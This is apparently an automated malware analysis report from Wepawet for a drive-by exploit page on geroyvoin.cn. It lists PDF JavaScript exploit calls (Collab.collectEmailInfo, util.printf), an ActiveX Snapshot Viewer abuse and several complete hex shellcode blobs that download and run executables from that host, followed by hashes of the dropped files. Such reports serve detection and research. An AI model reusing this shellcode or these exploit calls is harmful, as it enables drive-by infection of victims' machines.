	Collab.collectEmailInfo	''	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 196512 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1
	Collab.collectEmailInfo	''	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 196512 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1
	util.printf	%45000f	1.3E295	2

ShockwaveFlash.ShockwaveFlash.7
Name Arg0 Count
Methods

GetVariable
$version
2

ShockwaveFlash.ShockwaveFlash.7
	Name	Arg0	Count
Methods	GetVariable	$version	2

snpvw.Snapshot Viewer Control.1
	Name	Count
Methods	PrintSnapshot	2
	Name	Value	Count
Attributes	ShowNavigationButtons	false	2
	Zoom	0.0	2
	CompressedPath	c:/Program Files/Outlook Express/wab.exe	2
	AllowContextMenu	false	2
	SnapshotPath	http://geroyvoin.cn/1/jpy5.exe	2

clsid:ca8a9780-280d-11cf-a24d-444553540000

No attribute setting or method call detected

clsid:ca8a9780-280d-11cf-a24d-444553540000
No attribute setting or method call detected

Shellcode and Malware

Hexadecimal	ASCII
33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 62 64 65 70 71 72 32 2e 65 78 65 00 00	3.d.@0x..@..p... X....@4.@\|.X<jDZ ..+....OZR..V.U. VW.s<.t3x..V.v . .3.IPA.3.6....8. t......@..X;.u.^ .F$..f..H.V..... ..._^P..}.WR.3.. [.....2.....O.e. ex.f.f.3..ad..Ph Thre5$.itPTS.... \|.U.......l...Ph on.dhurlmT..N... U..P3.PPV.U..... .LRP.6./p.U.[WV. .....U.j...http: //geroyvoin.cn/1 /bdepqr2.exe..
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 62 67 6d 6e 72 73 79 7a 33 2e 65 78 65 00	.d......@0.@T.@. .@..@.. . .=\|.w. t..3.d.@0x..@..p ...X....@4.@\|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...\|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://geroyvoin.c n/1/bgmnrsyz3.ex e.
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 64 70 72 74 7a 33 2e 65 78 65 00 00	.d......@0.@T.@. .@..@.. . .=\|.w. t..3.d.@0x..@..p ...X....@4.@\|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...\|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://geroyvoin.c n/1/dprtz3.exe..
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 64 66 70 71 75 7a 33 2e 65 78 65 00	.d......@0.@T.@. .@..@.. . .=\|.w. t..3.d.@0x..@..p ...X....@4.@\|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...\|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://geroyvoin.c n/1/dfpquz3.exe.
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 64 65 67 6a 74 33 2e 65 78 65 00 00	.d......@0.@T.@. .@..@.. . .=\|.w. t..3.d.@0x..@..p ...X....@4.@\|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...\|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://geroyvoin.c n/1/degjt3.exe..
0a 0a 0a 0a 0a 0a 0a 0a 90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 62 64 66 6c 75 33 2e 65 78 65 00 00	.........d...... @0.@T.@..@..@.. . .=\|.w.t..3.d.@ 0x..@..p...X.... @4.@\|.X<jDZ..+.. ..OZR..V.U.VW.s< .t3x..V.v ..3.IP A.3.6....8.t.... ..@..X;.u.^.F$.. f..H.V........_^ P..}.WR.3..[.... .2.....O.u.ex.f. f.3..ad..PhThre5 $.itPTS....\|.U.. .....l...Phon.dh urlmT..N...U..P3 .PPV.U......LRP. 6./p.U.[WV...... U.j...http://ger oyvoin.cn/1/bdfl u3.exe..
0a 0a 0a 0a 0a 0a 0a 0a 90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 64 66 77 78 33 2e 65 78 65 00	.........d...... @0.@T.@..@..@.. . .=\|.w.t..3.d.@ 0x..@..p...X.... @4.@\|.X<jDZ..+.. ..OZR..V.U.VW.s< .t3x..V.v ..3.IP A.3.6....8.t.... ..@..X;.u.^.F$.. f..H.V........_^ P..}.WR.3..[.... .2.....O.u.ex.f. f.3..ad..PhThre5 $.itPTS....\|.U.. .....l...Phon.dh urlmT..N...U..P3 .PPV.U......LRP. 6./p.U.[WV...... U.j...http://ger oyvoin.cn/1/dfwx 3.exe.

Additional (potential) malware:

URL	Type	Hash	Analysis
http://geroyvoin.cn/1/bdepqr2.exe	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	e1e2b3389dd2e020ae2783b8c6c80a08	Anubis report Virustotal report
http://geroyvoin.cn/1/bdflu3.exe	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	e1e2b3389dd2e020ae2783b8c6c80a08	Anubis report Virustotal report
http://geroyvoin.cn/1/bgmnrsyz3.exe	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	e1e2b3389dd2e020ae2783b8c6c80a08	Anubis report Virustotal report
http://geroyvoin.cn/1/degjt3.exe	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	e1e2b3389dd2e020ae2783b8c6c80a08	Anubis report Virustotal report
http://geroyvoin.cn/1/dfpquz3.exe	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	e1e2b3389dd2e020ae2783b8c6c80a08	Anubis report Virustotal report
http://geroyvoin.cn/1/dfwx3.exe	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	e1e2b3389dd2e020ae2783b8c6c80a08	Anubis report Virustotal report
http://geroyvoin.cn/1/dprtz3.exe	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	e1e2b3389dd2e020ae2783b8c6c80a08	Anubis report
http://geroyvoin.cn/1/jpy5.exe	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	e1e2b3389dd2e020ae2783b8c6c80a08	Anubis report Virustotal report

Wepawet (alpha)

Analysis report for http://geroyvoin.cn/1/show.php?s=747bbfed51

Sample Overview

Detection results

Exploits

Deobfuscation results

Evals

Writes

Network Activity

Requests

Redirects

ActiveX controls

Shellcode and Malware